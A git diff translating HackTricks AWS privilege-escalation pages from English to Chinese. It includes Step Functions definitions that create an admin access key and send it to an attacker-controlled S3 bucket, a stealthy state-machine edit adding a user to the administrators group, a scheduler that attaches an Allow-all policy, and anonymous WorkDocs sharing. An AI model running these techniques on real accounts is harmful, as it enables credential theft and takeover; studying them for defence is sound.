+"Parameters": { +"UserName": "admin" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"End": true } ``` - -- **Command** executed to perform the privesc: - +- **命令** 执行以进行权限提升: ```bash aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole { - "output": "{ - \"AccessKey\":{ - \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", - \"CreateDate\":\"2024-07-09T16:59:11Z\", - \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", - \"Status\":\"Active\", - \"UserName\":\"admin\" - } - }", - "status": "SUCCEEDED" +"output": "{ +\"AccessKey\":{ +\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", +\"CreateDate\":\"2024-07-09T16:59:11Z\", +\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", +\"Status\":\"Active\", +\"UserName\":\"admin\" +} +}", +"status": "SUCCEEDED" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操控以及对敏感资源的访问,可能导致重大的安全漏洞。 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`) -An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. 
In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. - +拥有 **`states:CreateStateMachine`** 和 **`iam:PassRole`** 的攻击者将能够创建状态机并为其提供任何 IAM 角色,从而使其能够未经授权地访问其他 AWS 服务的角色权限。与之前的权限提升技术 (**`states:TestState`** & **`iam:PassRole`**) 相比,这种技术本身并不执行,您还需要拥有 **`states:StartExecution`** 或 **`states:StartSyncExecution`** 权限 (**`states:StartSyncExecution`** 对于标准工作流 **不可用**,**仅适用于表达状态机**) 以便启动状态机的执行。 ```bash # Create a state machine aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ @@ -82,176 +75,157 @@ aws states start-execution --state-machine-arn [--name ] [--input # Start a Synchronous Express state machine execution aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] ``` - -The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. +以下示例展示了如何创建一个状态机,该状态机为 **`admin`** 用户创建一个访问密钥,并将此访问密钥导出到攻击者控制的 S3 存储桶,利用这些权限和 AWS 环境的宽松角色。此宽松角色应与任何高权限策略相关联(例如 **`arn:aws:iam::aws:policy/AdministratorAccess`**),允许状态机执行 **`iam:CreateAccessKey`** 和 **`s3:putObject`** 操作。 - **stateMachineDefinition.json**: - ```json { - "Comment": "Malicious state machine to create IAM access key and upload to S3", - "StartAt": "CreateAccessKey", - "States": { - "CreateAccessKey": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "Parameters": { - "UserName": "admin" - }, - "ResultPath": "$.AccessKeyResult", - "Next": "PrepareS3PutObject" - }, - "PrepareS3PutObject": { - "Type": "Pass", - "Parameters": { - "Body.$": "$.AccessKeyResult.AccessKey", - "Bucket": "attacker-controlled-S3-bucket", - "Key": "AccessKey.json" - }, - "ResultPath": "$.S3PutObjectParams", - "Next": "PutObject" - }, - "PutObject": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:s3:putObject", - "Parameters": { - "Body.$": "$.S3PutObjectParams.Body", - "Bucket.$": "$.S3PutObjectParams.Bucket", - "Key.$": "$.S3PutObjectParams.Key" - }, - "End": true - } - } +"Comment": "Malicious state machine to create IAM access key and upload to S3", +"StartAt": "CreateAccessKey", +"States": { +"CreateAccessKey": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"Parameters": { +"UserName": "admin" +}, +"ResultPath": "$.AccessKeyResult", +"Next": "PrepareS3PutObject" +}, +"PrepareS3PutObject": { +"Type": "Pass", +"Parameters": { +"Body.$": "$.AccessKeyResult.AccessKey", +"Bucket": "attacker-controlled-S3-bucket", +"Key": "AccessKey.json" +}, +"ResultPath": "$.S3PutObjectParams", +"Next": "PutObject" +}, +"PutObject": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:s3:putObject", +"Parameters": { +"Body.$": "$.S3PutObjectParams.Body", +"Bucket.$": "$.S3PutObjectParams.Bucket", +"Key.$": "$.S3PutObjectParams.Key" +}, +"End": true +} +} 
} ``` - -- **Command** executed to **create the state machine**: - +- **命令** 执行以 **创建状态机**: ```bash aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole { - "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", - "creationDate": "2024-07-09T20:29:35.381000+02:00" +"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", +"creationDate": "2024-07-09T20:29:35.381000+02:00" } ``` - -- **Command** executed to **start an execution** of the previously created state machine: - +- **命令** 执行以 **启动之前创建的状态机的执行**: ```json aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine { - "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "startDate": "2024-07-09T20:33:35.466000+02:00" +"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"startDate": "2024-07-09T20:33:35.466000+02:00" } ``` - > [!WARNING] -> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. +> 攻击者控制的 S3 存储桶应具有接受来自受害者账户的 s3:PutObject 操作的权限。 -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操作以及对敏感资源的访问,可能导致重大安全漏洞。 -### `states:UpdateStateMachine` & (not always required) `iam:PassRole` +### `states:UpdateStateMachine` & (不总是需要) `iam:PassRole` -An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +拥有 **`states:UpdateStateMachine`** 权限的攻击者将能够修改状态机的定义,能够添加额外的隐蔽状态,这可能导致特权提升。这样,当合法用户启动状态机的执行时,这个新的恶意隐蔽状态将被执行,特权提升将成功。 -Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations: - -1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. -2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. +根据与状态机关联的 IAM 角色的权限程度,攻击者将面临两种情况: +1. **宽松的 IAM 角色**:如果与状态机关联的 IAM 角色已经是宽松的(例如,附加了 **`arn:aws:iam::aws:policy/AdministratorAccess`** 策略),那么不需要 **`iam:PassRole`** 权限来提升特权,因为不需要更新 IAM 角色,仅状态机定义就足够。 +2. 
**不宽松的 IAM 角色**:与前一种情况相反,在这里攻击者还需要 **`iam:PassRole`** 权限,因为除了修改状态机定义外,还需要将一个宽松的 IAM 角色与状态机关联。 ```bash aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ [--tracing-configuration ] [--publish | --no-publish] [--version-description ] ``` - -The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +以下示例展示了如何更新一个合法的状态机,该状态机仅调用一个 HelloWorld Lambda 函数,以添加一个额外的状态,将用户 **`unprivilegedUser`** 添加到 **`administrator`** IAM 组。这样,当合法用户启动更新后的状态机的执行时,这个新的恶意隐蔽状态将被执行,特权提升将成功。 > [!WARNING] -> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). +> 如果状态机没有关联一个宽松的 IAM 角色,则还需要 **`iam:PassRole`** 权限来更新 IAM 角色,以便关联一个宽松的 IAM 角色(例如,附加了 **`arn:aws:iam::aws:policy/AdministratorAccess`** 策略的角色)。 {{#tabs }} {{#tab name="Legit State Machine" }} - ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} -{{#tab name="Malicious Updated State Machine" }} - +{{#tab name="恶意更新状态机" }} ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "AddUserToGroup" - }, - "AddUserToGroup": { - "Type": "Task", - "Parameters": { - "GroupName": "administrator", - "UserName": "unprivilegedUser" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "AddUserToGroup" +}, +"AddUserToGroup": { +"Type": "Task", +"Parameters": { +"GroupName": 
"administrator", +"UserName": "unprivilegedUser" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} {{#endtabs }} -- **Command** executed to **update** **the legit state machine**: - +- **命令** 执行以 **更新** **合法状态机**: ```bash aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json { - "updateDate": "2024-07-10T20:07:10.294000+02:00", - "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"updateDate": "2024-07-10T20:07:10.294000+02:00", +"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操控以及对敏感资源的访问,可能导致重大的安全漏洞。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md index 782bcc237..823107033 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md @@ -6,121 +6,101 @@ ### `sts:AssumeRole` -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. +每个角色都创建了一个 **角色信任策略**,该策略指示 **谁可以假设创建的角色**。如果来自 **同一账户** 的角色表示某个账户可以假设它,这意味着该账户将能够访问该角色(并可能进行 **privesc**)。 +例如,以下角色信任策略表明任何人都可以假设它,因此 **任何用户都将能够进行 privesc** 到与该角色相关的权限。 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` - -You can impersonate a role running: - +您可以通过运行以下命令来模拟一个角色: ```bash aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname ``` - -**Potential Impact:** Privesc to the role. +**潜在影响:** 提权到角色。 > [!CAUTION] -> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
+> 请注意,在这种情况下,权限 `sts:AssumeRole` 需要在 **被滥用的角色中指明**,而不是在攻击者的策略中。\ +> 除此之外,为了 **从不同账户假设角色**,攻击者账户 **还需要** 对该角色拥有 **`sts:AssumeRole`** 权限。 ### **`sts:GetFederationToken`** -With this permission it's possible to generate credentials to impersonate any user: - +拥有此权限可以生成凭证以冒充任何用户: ```bash aws sts get-federation-token --name ``` - -This is how this permission can be given securely without giving access to impersonate other users: - +这是如何安全地授予此权限而不允许访问冒充其他用户的: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "VisualEditor0", +"Effect": "Allow", +"Action": "sts:GetFederationToken", +"Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" +} +] } ``` - ### `sts:AssumeRoleWithSAML` -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: +一个包含此角色的信任策略授予**通过 SAML 认证的用户访问以假冒该角色的权限。** +具有此权限的信任策略示例如下: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "OneLogin", +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" +}, +"Action": "sts:AssumeRoleWithSAML", +"Condition": { +"StringEquals": { +"SAML:aud": "https://signin.aws.amazon.com/saml" +} +} +} +] } ``` - -To generate credentials to impersonate the role in general you could use something like: - +要生成凭证以模拟角色,通常可以使用以下内容: ```bash aws sts assume-role-with-saml --role-arn --principal-arn ``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - +但 **提供商** 可能有他们 **自己的工具** 来简化这一过程,比如 [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): ```bash onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 ``` - -**Potential Impact:** Privesc to the role. +**潜在影响:** 提升到角色。 ### `sts:AssumeRoleWithWebIdentity` -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. 
[Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: +此权限允许为**已在移动、Web 应用程序、EKS...中经过身份验证的用户**获取一组临时安全凭证,使用网络身份提供者。[在这里了解更多。](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) +例如,如果一个**EKS 服务账户**应该能够**模拟一个 IAM 角色**,它将在**`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`**中拥有一个令牌,并可以通过执行类似的操作**假设角色并获取凭证**: ```bash aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token # The role name can be found in the metadata of the configuration of the pod ``` - -### Federation Abuse +### 联邦滥用 {{#ref}} ../aws-basic-information/aws-federation-abuse.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 4b1e5e7e9..f1ddf608d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -2,7 +2,7 @@ ## WorkDocs -For more info about WorkDocs check: +有关 WorkDocs 的更多信息,请查看: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md @@ -10,17 +10,14 @@ For more info about WorkDocs check: ### `workdocs:CreateUser` -Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD: - +在指定的目录中创建一个用户,然后您将可以访问 WorkDocs 和 AD: ```bash # Create user (created inside the AD) aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password --email-address name@directory.domain --organization-id ``` - ### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)` -The files might contain sensitive information, read them: - +这些文件可能包含敏感信息,请阅读它们: ```bash # Get what was created in the directory aws workdocs describe-activities --organization-id @@ -31,26 +28,19 @@ aws workdocs describe-activities --user-id "S-1-5-21-377..." # Get file (a url to access with the content will be retreived) aws workdocs get-document --document-id ``` - ### `workdocs:AddResourcePermissions` -If you don't have access to read something, you can just grant it - +如果您没有权限读取某些内容,您可以直接授予它 ```bash # Add permission so anyway can see the file aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### `workdocs:AddUserToGroup` -You can make a user admin by setting it in the group ZOCALO_ADMIN.\ -For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) - -Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` - -I didn't find any way to do this from the cli. 
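To find valid user IDs to plug into the calls above (for example `describe-activities --user-id`, or when choosing whom to target), one option — assuming `workdocs:DescribeUsers` is also granted and `<directory-id>` is a placeholder for the organization/directory ID — is:
```bash
# Enumerate the WorkDocs users of the directory
aws workdocs describe-users --organization-id <directory-id> \
    --query "Users[].{Id:Id,User:Username,Email:EmailAddress}"
```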
- - +您可以通过将用户设置在组 ZOCALO_ADMIN 中来使其成为管理员。\ +为此,请按照 [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) 中的说明进行操作。 +使用该用户登录 workdoc,并在 `/workdocs/index.html#/admin` 中访问管理面板。 +我没有找到任何通过 CLI 执行此操作的方法。 diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md index 1519df70f..31f58fb61 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -4,7 +4,7 @@ ## EventBridge Scheduler -More info EventBridge Scheduler in: +更多信息关于 EventBridge Scheduler 在: {{#ref}} ../aws-services/eventbridgescheduler-enum.md @@ -12,42 +12,34 @@ More info EventBridge Scheduler in: ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: +拥有这些权限的攻击者将能够 **`创建`|`更新`一个调度程序并滥用附加到它的调度程序角色的权限** 来执行任何操作 +例如,他们可以配置调度以 **调用一个 Lambda 函数**,这是一个模板化的操作: ```bash aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' +--name MyLambdaSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:lambda:::function:", +"RoleArn": "arn:aws:iam:::role/" +}' ``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. 
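The `update` path works the same way against a schedule that already exists. This is an illustrative sketch (placeholders in angle brackets, not taken from the original); note that `update-schedule` replaces the whole schedule definition, so every required field must be supplied again:
```bash
aws scheduler update-schedule \
    --name MyLambdaSchedule \
    --schedule-expression "rate(5 minutes)" \
    --flexible-time-window "Mode=OFF" \
    --target '{
        "Arn": "arn:aws:lambda:<region>:<account-id>:function:<function-name>",
        "RoleArn": "arn:aws:iam::<account-id>:role/<scheduler-role>"
    }'
```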
One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - +除了模板化的服务操作,您可以在 EventBridge Scheduler 中使用 **universal targets** 来调用许多 AWS 服务的广泛 API 操作。Universal targets 提供了灵活性,可以调用几乎任何 API。一个例子是使用 universal targets 添加 "**AdminAccessPolicy**",使用具有 "**putRolePolicy**" 策略的角色: ```bash aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' +--name GrantAdminToTargetRoleSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", +"RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", +"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" +}' ``` - -## References +## 参考 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md index fc3563ce7..4e8f2f1a0 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md @@ -2,7 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} -For more information about Route53 check: +有关Route53的更多信息,请查看: {{#ref}} ../aws-services/aws-route53-enum.md @@ -11,26 +11,22 @@ For more information about Route53 check: ### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` > [!NOTE] -> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. 
+> 要执行此攻击,目标账户必须已经在账户中设置了[**AWS证书管理器私有证书颁发机构**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)**,并且VPC中的EC2实例必须已经导入证书以信任它。建立此基础设施后,可以执行以下攻击以拦截AWS API流量。 -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` +其他权限**建议但不是枚举部分所必需的**:`route53:GetHostedZone`,`route53:ListHostedZones`,`acm-pca:ListCertificateAuthorities`,`ec2:DescribeVpcs` -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. +假设有一个AWS VPC,多个云原生应用程序相互通信并与AWS API通信。由于微服务之间的通信通常是TLS加密的,因此必须有一个私有CA来为这些服务颁发有效证书。**如果使用ACM-PCA**,并且对手设法获得**控制route53和acm-pca私有CA的访问权限**,并具备上述描述的最小权限集,则可以**劫持对AWS API的应用程序调用**,接管其IAM权限。 -This is possible because: +这是可能的,因为: -- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names +- AWS SDK不具有[证书钉扎](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) +- Route53允许为AWS API域名创建私有托管区域和DNS记录 +- ACM-PCA中的私有CA不能限制仅为特定通用名称签署证书 -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**潜在影响:** 通过拦截流量中的敏感信息实现间接权限提升。 -#### Exploitation +#### 利用 -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) +在原始研究中找到利用步骤:[**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md index dddd8ac04..e65f9252e 100644 --- a/src/pentesting-cloud/aws-security/aws-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/README.md @@ -1,35 +1,31 @@ -# AWS - Services +# AWS - 服务 {{#include ../../../banners/hacktricks-training.md}} -## Types of services +## 服务类型 -### Container services +### 容器服务 -Services that fall under container services have the following characteristics: +属于容器服务的服务具有以下特征: -- The service itself runs on **separate infrastructure instances**, such as EC2. -- **AWS** is responsible for **managing the operating system and the platform**. -- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -- Also, platform-level identity and access management where it exists. -- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. 
